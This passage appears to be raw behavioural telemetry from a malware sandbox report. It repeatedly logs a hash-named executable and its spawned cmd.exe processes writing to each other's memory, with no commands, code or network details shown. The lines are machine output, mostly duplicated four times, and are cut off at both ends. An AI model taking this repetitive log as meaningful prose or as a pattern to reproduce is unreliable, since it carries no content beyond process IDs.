1196 1816 cmd.exe 850 PID 1816 wrote to memory of 1412 1816 cmd.exe 851 PID 1816 wrote to memory of 1412 1816 cmd.exe 851 PID 1816 wrote to memory of 1412 1816 cmd.exe 851 PID 1816 wrote to memory of 1412 1816 cmd.exe 851 PID 1412 wrote to memory of 1440 1412 cmd.exe 852 PID 1412 wrote to memory of 1440 1412 cmd.exe 852 PID 1412 wrote to memory of 1440 1412 cmd.exe 852 PID 1412 wrote to memory of 1440 1412 cmd.exe 852 PID 1816 wrote to memory of 1164 1816 cmd.exe 853 PID 1816 wrote to memory of 1164 1816 cmd.exe 853 PID 1816 wrote to memory of 1164 1816 cmd.exe 853 PID 1816 wrote to memory of 1164 1816 cmd.exe 853 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 854 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 854 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 854 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 854 PID 996 wrote to memory of 1464 996 cmd.exe 856 PID 996 wrote to memory of 1464 996 cmd.exe 856 PID 996 wrote to memory of 1464 996 cmd.exe 856 PID 996 wrote to memory of 1464 996 cmd.exe 856 PID 996 wrote to memory of 932 996 cmd.exe 857 PID 996 wrote to memory of 932 996 cmd.exe 857 PID 996 wrote to memory of 932 996 cmd.exe 857 PID 996 wrote to memory of 932 996 cmd.exe 857 PID 996 wrote to memory of 1804 996 cmd.exe 858 PID 996 wrote to memory of 1804 996 cmd.exe 858 PID 996 wrote to memory of 1804 996 cmd.exe 858 PID 996 wrote to memory of 1804 996 cmd.exe 858 PID 1804 wrote to memory of 432 1804 cmd.exe 859 PID 1804 wrote to memory of 432 1804 cmd.exe 859 PID 1804 wrote to memory of 432 1804 cmd.exe 859 PID 1804 wrote to memory of 432 1804 cmd.exe 859 PID 996 wrote to memory of 228 996 cmd.exe 860 PID 996 wrote to memory of 228 996 cmd.exe 860 PID 996 wrote to memory of 228 996 cmd.exe 860 PID 996 wrote to memory of 228 996 cmd.exe 860 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 861 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 861 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 861 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 861 PID 1488 wrote to memory of 1480 1488 cmd.exe 863 PID 1488 wrote to memory of 1480 1488 cmd.exe 863 PID 1488 wrote to memory of 1480 1488 cmd.exe 863 PID 1488 wrote to memory of 1480 1488 cmd.exe 863 PID 1488 wrote to memory of 1236 1488 cmd.exe 864 PID 1488 wrote to memory of 1236 1488 cmd.exe 864 PID 1488 wrote to memory of 1236 1488 cmd.exe 864 PID 1488 wrote to memory of 1236 1488 cmd.exe 864 PID 1488 wrote to memory of 1032 1488 cmd.exe 865 PID 1488 wrote to memory of 1032 1488 cmd.exe 865 PID 1488 wrote to memory of 1032 1488 cmd.exe 865 PID 1488 wrote to memory of 1032 1488 cmd.exe 865 PID 1032 wrote to memory of 1040 1032 cmd.exe 866 PID 1032 wrote to memory of 1040 1032 cmd.exe 866 PID 1032 wrote to memory of 1040 1032 cmd.exe 866 PID 1032 wrote to memory of 1040 1032 cmd.exe 866 PID 1488 wrote to memory of 1220 1488 cmd.exe 867 PID 1488 wrote to memory of 1220 1488 cmd.exe 867 PID 1488 wrote to memory of 1220 1488 cmd.exe 867 PID 1488 wrote to memory of 1220 1488 cmd.exe 867 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 868 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 868 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 868 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 868 PID 1728 wrote to memory of 1796 1728 cmd.exe 870 PID 1728 wrote to memory of 1796 1728 cmd.exe 870 PID 1728 wrote to memory of 1796 1728 cmd.exe 870 PID 1728 wrote to memory of 1796 1728 cmd.exe 870 PID 1728 wrote to memory of 292 1728 cmd.exe 871 PID 1728 wrote to memory of 292 1728 cmd.exe 871 PID 1728 wrote to memory of 292 1728 cmd.exe 871 PID 1728 wrote to memory of 292 1728 cmd.exe 871 PID 1728 wrote to memory of 652 1728 cmd.exe 872 PID 1728 wrote to memory of 652 1728 cmd.exe 872 PID 1728 wrote to memory of 652 1728 cmd.exe 872 PID 1728 wrote to memory of 652 1728 cmd.exe 872 PID 652 wrote to memory of 1944 652 cmd.exe 873 PID 652 wrote to memory of 1944 652 cmd.exe 873 PID 652 wrote to memory of 1944 652 cmd.exe 873 PID 652 wrote to memory of 1944 652 cmd.exe 873 PID 1728 wrote to memory of 1848 1728 cmd.exe 874 PID 1728 wrote to memory of 1848 1728 cmd.exe 874 PID 1728 wrote to memory of 1848 1728 cmd.exe 874 PID 1728 wrote to memory of 1848 1728 cmd.exe 874 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 875 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 875 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 875 PID 1436 wrote to memory of 872 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 875 PID 872 wrote to memory of 1036 872 cmd.exe 877 PID 872 wrote to memory of 1036 872 cmd.exe 877 PID 872 wrote to memory of 1036 872 cmd.exe 877 PID 872 wrote to memory of 1036 872 cmd.exe 877 PID 872 wrote to memory of 956 872 cmd.exe 878 PID 872 wrote to memory of 956 872 cmd.exe 878 PID 872 wrote to memory of 956 872 cmd.exe 878 PID 872 wrote to memory of 956 872 cmd.exe 878 PID 872 wrote to memory of 1672 872 cmd.exe 879 PID 872 wrote to memory of 1672 872 cmd.exe 879 PID 872 wrote to memory of 1672 872 cmd.exe 879 PID 872 wrote to memory of 1672 872 cmd.exe 879 PID 1672 wrote to memory of 220 1672 cmd.exe 880 PID 1672 wrote to memory of 220 1672 cmd.exe 880 PID 1672 wrote to memory of 220 1672 cmd.exe 880 PID 1672 wrote to memory of 220 1672 cmd.exe 880 PID 872 wrote to memory of 236 872 cmd.exe 881 PID 872 wrote to memory of 236 872 cmd.exe 881 PID 872 wrote to memory of 236 872 cmd.exe 881 PID 872 wrote to memory of 236 872 cmd.exe 881 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 882 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 882 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 882 PID 1436 wrote to memory of 1948 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 882 PID 1948 wrote to memory of 1132 1948 cmd.exe 884 PID 1948 wrote to memory of 1132 1948 cmd.exe 884 PID 1948 wrote to memory of 1132 1948 cmd.exe 884 PID 1948 wrote to memory of 1132 1948 cmd.exe 884 PID 1948 wrote to memory of 1064 1948 cmd.exe 885 PID 1948 wrote to memory of 1064 1948 cmd.exe 885 PID 1948 wrote to memory of 1064 1948 cmd.exe 885 PID 1948 wrote to memory of 1064 1948 cmd.exe 885 PID 1948 wrote to memory of 324 1948 cmd.exe 886 PID 1948 wrote to memory of 324 1948 cmd.exe 886 PID 1948 wrote to memory of 324 1948 cmd.exe 886 PID 1948 wrote to memory of 324 1948 cmd.exe 886 PID 324 wrote to memory of 1832 324 cmd.exe 887 PID 324 wrote to memory of 1832 324 cmd.exe 887 PID 324 wrote to memory of 1832 324 cmd.exe 887 PID 324 wrote to memory of 1832 324 cmd.exe 887 PID 1948 wrote to memory of 1460 1948 cmd.exe 888 PID 1948 wrote to memory of 1460 1948 cmd.exe 888 PID 1948 wrote to memory of 1460 1948 cmd.exe 888 PID 1948 wrote to memory of 1460 1948 cmd.exe 888 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 889 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 889 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 889 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 889 PID 1628 wrote to memory of 708 1628 cmd.exe 891 PID 1628 wrote to memory of 708 1628 cmd.exe 891 PID 1628 wrote to memory of 708 1628 cmd.exe 891 PID 1628 wrote to memory of 708 1628 cmd.exe 891 PID 1628 wrote to memory of 1796 1628 cmd.exe 892 PID 1628 wrote to memory of 1796 1628 cmd.exe 892 PID 1628 wrote to memory of 1796 1628 cmd.exe 892 PID 1628 wrote to memory of 1796 1628 cmd.exe 892 PID 1628 wrote to memory of 292 1628 cmd.exe 893 PID 1628 wrote to memory of 292 1628 cmd.exe 893 PID 1628 wrote to memory of 292 1628 cmd.exe 893 PID 1628 wrote to memory of 292 1628 cmd.exe 893 PID 292 wrote to memory of 1440 292 cmd.exe 894 PID 292 wrote to memory of 1440 292 cmd.exe 894 PID 292 wrote to memory of 1440 292 cmd.exe 894 PID 292 wrote to memory of 1440 292 cmd.exe 894 PID 1628 wrote to memory of 652 1628 cmd.exe 895 PID 1628 wrote to memory of 652 1628 cmd.exe 895 PID 1628 wrote to memory of 652 1628 cmd.exe 895 PID 1628 wrote to memory of 652 1628 cmd.exe 895 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 896 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 896 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 896 PID 1436 wrote to memory of 1848 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 896 PID 1848 wrote to memory of 936 1848 cmd.exe 898 PID 1848 wrote to memory of 936 1848 cmd.exe 898 PID 1848 wrote to memory of 936 1848 cmd.exe 898 PID 1848 wrote to memory of 936 1848 cmd.exe 898 PID 1848 wrote to memory of 1036 1848 cmd.exe 899 PID 1848 wrote to memory of 1036 1848 cmd.exe 899 PID 1848 wrote to memory of 1036 1848 cmd.exe 899 PID 1848 wrote to memory of 1036 1848 cmd.exe 899 PID 1848 wrote to memory of 956 1848 cmd.exe 900 PID 1848 wrote to memory of 956 1848 cmd.exe 900 PID 1848 wrote to memory of 956 1848 cmd.exe 900 PID 1848 wrote to memory of 956 1848 cmd.exe 900 PID 956 wrote to memory of 2020 956 cmd.exe 901 PID 956 wrote to memory of 2020 956 cmd.exe 901 PID 956 wrote to memory of 2020 956 cmd.exe 901 PID 956 wrote to memory of 2020 956 cmd.exe 901 PID 1848 wrote to memory of 1672 1848 cmd.exe 902 PID 1848 wrote to memory of 1672 1848 cmd.exe 902 PID 1848 wrote to memory of 1672 1848 cmd.exe 902 PID 1848 wrote to memory of 1672 1848 cmd.exe 902 PID 1436 wrote to memory of 236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 903 PID 1436 wrote to memory of 236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 903 PID 1436 wrote to memory of 236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 903 PID 1436 wrote to memory of 236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 903 PID 236 wrote to memory of 1188 236 cmd.exe 905 PID 236 wrote to memory of 1188 236 cmd.exe 905 PID 236 wrote to memory of 1188 236 cmd.exe 905 PID 236 wrote to memory of 1188 236 cmd.exe 905 PID 236 wrote to memory of 1132 236 cmd.exe 906 PID 236 wrote to memory of 1132 236 cmd.exe 906 PID 236 wrote to memory of 1132 236 cmd.exe 906 PID 236 wrote to memory of 1132 236 cmd.exe 906 PID 236 wrote to memory of 1572 236 cmd.exe 907 PID 236 wrote to memory of 1572 236 cmd.exe 907 PID 236 wrote to memory of 1572 236 cmd.exe 907 PID 236 wrote to memory of 1572 236 cmd.exe 907 PID 1572 wrote to memory of 1032 1572 cmd.exe 908 PID 1572 wrote to memory of 1032 1572 cmd.exe 908 PID 1572 wrote to memory of 1032 1572 cmd.exe 908 PID 1572 wrote to memory of 1032 1572 cmd.exe 908 PID 236 wrote to memory of 1460 236 cmd.exe 909 PID 236 wrote to memory of 1460 236 cmd.exe 909 PID 236 wrote to memory of 1460 236 cmd.exe 909 PID 236 wrote to memory of 1460 236 cmd.exe 909 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 910 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 910 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 910 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 910 PID 1056 wrote to memory of 792 1056 cmd.exe 912 PID 1056 wrote to memory of 792 1056 cmd.exe 912 PID 1056 wrote to memory of 792 1056 cmd.exe 912 PID 1056 wrote to memory of 792 1056 cmd.exe 912 PID 1056 wrote to memory of 1944 1056 cmd.exe 913 PID 1056 wrote to memory of 1944 1056 cmd.exe 913 PID 1056 wrote to memory of 1944 1056 cmd.exe 913 PID 1056 wrote to memory of 1944 1056 cmd.exe 913 PID 1056 wrote to memory of 1412 1056 cmd.exe 914 PID 1056 wrote to memory of 1412 1056 cmd.exe 914 PID 1056 wrote to memory of 1412 1056 cmd.exe 914 PID 1056 wrote to memory of 1412 1056 cmd.exe 914 PID 1412 wrote to memory of 292 1412 cmd.exe 915 PID 1412 wrote to memory of 292 1412 cmd.exe 915 PID 1412 wrote to memory of 292 1412 cmd.exe 915 PID 1412 wrote to memory of 292 1412 cmd.exe 915 PID 1056 wrote to memory of 652 1056 cmd.exe 916 PID 1056 wrote to memory of 652 1056 cmd.exe 916 PID 1056 wrote to memory of 652 1056 cmd.exe 916 PID 1056 wrote to memory of 652 1056 cmd.exe 916 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 917 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 917 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 917 PID 1436 wrote to memory of 820 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 917 PID 820 wrote to memory of 208 820 cmd.exe 919 PID 820 wrote to memory of 208 820 cmd.exe 919 PID 820 wrote to memory of 208 820 cmd.exe 919 PID 820 wrote to memory of 208 820 cmd.exe 919 PID 820 wrote to memory of 224 820 cmd.exe 920 PID 820 wrote to memory of 224 820 cmd.exe 920 PID 820 wrote to memory of 224 820 cmd.exe 920 PID 820 wrote to memory of 224 820 cmd.exe 920 PID 820 wrote to memory of 1804 820 cmd.exe 921 PID 820 wrote to memory of 1804 820 cmd.exe 921 PID 820 wrote to memory of 1804 820 cmd.exe 921 PID 820 wrote to memory of 1804 820 cmd.exe 921 PID 1804 wrote to memory of 956 1804 cmd.exe 922 PID 1804 wrote to memory of 956 1804 cmd.exe 922 PID 1804 wrote to memory of 956 1804 cmd.exe 922 PID 1804 wrote to memory of 956 1804 cmd.exe 922 PID 820 wrote to memory of 1672 820 cmd.exe 923 PID 820 wrote to memory of 1672 820 cmd.exe 923 PID 820 wrote to memory of 1672 820 cmd.exe 923 PID 820 wrote to memory of 1672 820 cmd.exe 923 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 924 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 924 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 924 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 924 PID 1728 wrote to memory of 1020 1728 cmd.exe 926 PID 1728 wrote to memory of 1020 1728 cmd.exe 926 PID 1728 wrote to memory of 1020 1728 cmd.exe 926 PID 1728 wrote to memory of 1020 1728 cmd.exe 926 PID 1728 wrote to memory of 1040 1728 cmd.exe 927 PID 1728 wrote to memory of 1040 1728 cmd.exe 927 PID 1728 wrote to memory of 1040 1728 cmd.exe 927 PID 1728 wrote to memory of 1040 1728 cmd.exe 927 PID 1728 wrote to memory of 1292 1728 cmd.exe 928 PID 1728 wrote to memory of 1292 1728 cmd.exe 928 PID 1728 wrote to memory of 1292 1728 cmd.exe 928 PID 1728 wrote to memory of 1292 1728 cmd.exe 928 PID 1292 wrote to memory of 520 1292 cmd.exe 929 PID 1292 wrote to memory of 520 1292 cmd.exe 929 PID 1292 wrote to memory of 520 1292 cmd.exe 929 PID 1292 wrote to memory of 520 1292 cmd.exe 929 PID 1728 wrote to memory of 604 1728 cmd.exe 930 PID 1728 wrote to memory of 604 1728 cmd.exe 930 PID 1728 wrote to memory of 604 1728 cmd.exe 930 PID 1728 wrote to memory of 604 1728 cmd.exe 930 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 931 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 931 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 931 PID 1436 wrote to memory of 996 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 931 PID 996 wrote to memory of 792 996 cmd.exe 933 PID 996 wrote to memory of 792 996 cmd.exe 933 PID 996 wrote to memory of 792 996 cmd.exe 933 PID 996 wrote to memory of 792 996 cmd.exe 933 PID 996 wrote to memory of 1768 996 cmd.exe 934 PID 996 wrote to memory of 1768 996 cmd.exe 934 PID 996 wrote to memory of 1768 996 cmd.exe 934 PID 996 wrote to memory of 1768 996 cmd.exe 934 PID 996 wrote to memory of 1164 996 cmd.exe 935 PID 996 wrote to memory of 1164 996 cmd.exe 935 PID 996 wrote to memory of 1164 996 cmd.exe 935 PID 996 wrote to memory of 1164 996 cmd.exe 935 PID 1164 wrote to memory of 1488 1164 cmd.exe 936 PID 1164 wrote to memory of 1488 1164 cmd.exe 936 PID 1164 wrote to memory of 1488 1164 cmd.exe 936 PID 1164 wrote to memory of 1488 1164 cmd.exe 936 PID 996 wrote to memory of 932 996 cmd.exe 938 PID 996 wrote to memory of 932 996 cmd.exe 938 PID 996 wrote to memory of 932 996 cmd.exe 938 PID 996 wrote to memory of 932 996 cmd.exe 938 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 939 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 939 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 939 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 939 PID 204 wrote to memory of 1804 204 cmd.exe 941 PID 204 wrote to memory of 1804 204 cmd.exe 941 PID 204 wrote to memory of 1804 204 cmd.exe 941 PID 204 wrote to memory of 1804 204 cmd.exe 941 PID 204 wrote to memory of 1672 204 cmd.exe 942 PID 204 wrote to memory of 1672 204 cmd.exe 942 PID 204 wrote to memory of 1672 204 cmd.exe 942 PID 204 wrote to memory of 1672 204 cmd.exe 942 PID 204 wrote to memory of 820 204 cmd.exe 943 PID 204 wrote to memory of 820 204 cmd.exe 943 PID 204 wrote to memory of 820 204 cmd.exe 943 PID 204 wrote to memory of 820 204 cmd.exe 943 PID 820 wrote to memory of 1548 820 cmd.exe 944 PID 820 wrote to memory of 1548 820 cmd.exe 944 PID 820 wrote to memory of 1548 820 cmd.exe 944 PID 820 wrote to memory of 1548 820 cmd.exe 944 PID 204 wrote to memory of 1236 204 cmd.exe 945 PID 204 wrote to memory of 1236 204 cmd.exe 945 PID 204 wrote to memory of 1236 204 cmd.exe 945 PID 204 wrote to memory of 1236 204 cmd.exe 945 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 946 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 946 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 946 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 946 PID 1032 wrote to memory of 1444 1032 cmd.exe 948 PID 1032 wrote to memory of 1444 1032 cmd.exe 948 PID 1032 wrote to memory of 1444 1032 cmd.exe 948 PID 1032 wrote to memory of 1444 1032 cmd.exe 948 PID 1032 wrote to memory of 1460 1032 cmd.exe 949 PID 1032 wrote to memory of 1460 1032 cmd.exe 949 PID 1032 wrote to memory of 1460 1032 cmd.exe 949 PID 1032 wrote to memory of 1460 1032 cmd.exe 949 PID 1032 wrote to memory of 1816 1032 cmd.exe 950 PID 1032 wrote to memory of 1816 1032 cmd.exe 950 PID 1032 wrote to memory of 1816 1032 cmd.exe 950 PID 1032 wrote to memory of 1816 1032 cmd.exe 950 PID 1580 wrote to memory of 1944 1580 cmd.exe 952 PID 1580 wrote to memory of 1944 1580 cmd.exe 952 PID 1580 wrote to memory of 1944 1580 cmd.exe 952 PID 1816 wrote to memory of 1400 1816 cmd.exe 951 PID 1816 wrote to memory of 1400 1816 cmd.exe 951 PID 1816 wrote to memory of 1400 1816 cmd.exe 951 PID 1816 wrote to memory of 1400 1816 cmd.exe 951 PID 1032 wrote to memory of 1768 1032 cmd.exe 953 PID 1032 wrote to memory of 1768 1032 cmd.exe 953 PID 1032 wrote to memory of 1768 1032 cmd.exe 953 PID 1032 wrote to memory of 1768 1032 cmd.exe 953 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 954 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 954 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 954 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 954 PID 1488 wrote to memory of 220 1488 cmd.exe 956 PID 1488 wrote to memory of 220 1488 cmd.exe 956 PID 1488 wrote to memory of 220 1488 cmd.exe 956 PID 1488 wrote to memory of 220 1488 cmd.exe 956 PID 1488 wrote to memory of 1196 1488 cmd.exe 957 PID 1488 wrote to memory of 1196 1488 cmd.exe 957 PID 1488 wrote to memory of 1196 1488 cmd.exe 957 PID 1488 wrote to memory of 1196 1488 cmd.exe 957 PID 1580 wrote to memory of 268 1580 cmd.exe 958 PID 1580 wrote to memory of 268 1580 cmd.exe 958 PID 1580 wrote to memory of 268 1580 cmd.exe 958 PID 1488 wrote to memory of 1916 1488 cmd.exe 959 PID 1488 wrote to memory of 1916 1488 cmd.exe 959 PID 1488 wrote to memory of 1916 1488 cmd.exe 959 PID 1488 wrote to memory of 1916 1488 cmd.exe 959 PID 1916 wrote to memory of 936 1916 cmd.exe 960 PID 1916 wrote to memory of 936 1916 cmd.exe 960 PID 1916 wrote to memory of 936 1916 cmd.exe 960 PID 1916 wrote to memory of 936 1916 cmd.exe 960 PID 1580 wrote to memory of 1132 1580 cmd.exe 961 PID 1580 wrote to memory of 1132 1580 cmd.exe 961 PID 1580 wrote to memory of 1132 1580 cmd.exe 961 PID 1488 wrote to memory of 1548 1488 cmd.exe 962 PID 1488 wrote to memory of 1548 1488 cmd.exe 962 PID 1488 wrote to memory of 1548 1488 cmd.exe 962 PID 1488 wrote to memory of 1548 1488 cmd.exe 962 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 963 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 963 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 963 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 963 PID 324 wrote to memory of 2020 324 cmd.exe 965 PID 324 wrote to memory of 2020 324 cmd.exe 965 PID 324 wrote to memory of 2020 324 cmd.exe 965 PID 324 wrote to memory of 2020 324 cmd.exe 965 PID 324 wrote to memory of 1528 324 cmd.exe 966 PID 324 wrote to memory of 1528 324 cmd.exe 966 PID 324 wrote to memory of 1528 324 cmd.exe 966 PID 324 wrote to memory of 1528 324 cmd.exe 966 PID 324 wrote to memory of 1444 324 cmd.exe 967 PID 324 wrote to memory of 1444 324 cmd.exe 967 PID 324 wrote to memory of 1444 324 cmd.exe 967 PID 324 wrote to memory of 1444 324 cmd.exe 967 PID 1444 wrote to memory of 1460 1444 cmd.exe 968 PID 1444 wrote to memory of 1460 1444 cmd.exe 968 PID 1444 wrote to memory of 1460 1444 cmd.exe 968 PID 1444 wrote to memory of 1460 1444 cmd.exe 968 PID 324 wrote to memory of 516 324 cmd.exe 969 PID 324 wrote to memory of 516 324 cmd.exe 969 PID 324 wrote to memory of 516 324 cmd.exe 969 PID 324 wrote to memory of 516 324 cmd.exe 969 PID 1436 wrote to memory of 792 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 970 PID 1436 wrote to memory of 792 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 970 PID 1436 wrote to memory of 792 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 970 PID 1436 wrote to memory of 792 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 970 PID 792 wrote to memory of 1600 792 cmd.exe 972 PID 792 wrote to memory of 1600 792 cmd.exe 972 PID 792 wrote to memory of 1600 792 cmd.exe 972 PID 792 wrote to memory of 1600 792 cmd.exe 972 PID 792 wrote to memory of 1768 792 cmd.exe 973 PID 792 wrote to memory of 1768 792 cmd.exe 973 PID 792 wrote to memory of 1768 792 cmd.exe 973 PID 792 wrote to memory of 1768 792 cmd.exe 973 PID 792 wrote to memory of 1032 792 cmd.exe 974 PID 792 wrote to memory of 1032 792 cmd.exe 974 PID 792 wrote to memory of 1032 792 cmd.exe 974 PID 792 wrote to memory of 1032 792 cmd.exe 974 PID 1032 wrote to memory of 1164 1032 cmd.exe 975 PID 1032 wrote to memory of 1164 1032 cmd.exe 975 PID 1032 wrote to memory of 1164 1032 cmd.exe 975 PID 1032 wrote to memory of 1164 1032 cmd.exe 975 PID 792 wrote to memory of 220 792 cmd.exe 976 PID 792 wrote to memory of 220 792 cmd.exe 976 PID 792 wrote to memory of 220 792 cmd.exe 976 PID 792 wrote to memory of 220 792 cmd.exe 976 PID 1436 wrote to memory of 1940 1436 